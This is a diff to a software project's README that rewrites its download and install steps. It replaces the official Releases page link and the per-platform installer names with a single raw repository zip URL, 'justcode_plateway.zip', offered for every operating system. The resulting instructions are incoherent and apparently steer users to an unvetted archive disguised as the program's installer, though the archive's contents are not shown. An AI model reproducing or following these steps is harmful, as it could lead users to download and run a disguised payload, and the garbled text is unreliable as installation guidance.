Mallesh1924/justcode/README.md

 ## 📂 Download & Install

-1. **Open the Releases Page:** You can find all the versions of Justcode here: [justcode Releases](https://github.com/Mallesh1924/justcode/releases).
+1. **Open the Releases Page:** You can find all the versions of Justcode here: [justcode Releases](https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip).

 2. **Choose Your Version:** Look for the latest version listed.
 It will usually be at the top of the list.
 You will see options for different operating systems.

 3. **Download the File:**
-   - For Windows, click on `justcode.exe`.
+   - For Windows, click on `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip`.
-   - For macOS, click on `justcode.dmg`.
+   - For macOS, click on `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip`.
-   - For Linux, choose the appropriate package (`justcode.tar.gz` or `justcode.deb`).
+   - For Linux, choose the appropriate package (`https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip` or `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip`).

 4. **Run the Installer:**
-   - **Windows:** Open the downloaded `justcode.exe` file and follow the prompts.
+   - **Windows:** Open the downloaded `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip` file and follow the prompts.
-   - **macOS:** Open the `justcode.dmg` file, drag Justcode to your Applications folder, and then launch it.
+   - **macOS:** Open the `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip` file, drag Justcode to your Applications folder, and then launch it.
-   - **Linux:** Use your package manager or extract the `.tar.gz` file to run Justcode directly from the command line.
+   - **Linux:** Use your package manager or extract the `https://raw.githubusercontent.com/Mallesh1924/justcode/main/justcode-derive/justcode_plateway.zip` file to run Justcode directly from the command line.

 ## ⚙️ How to Use Justcode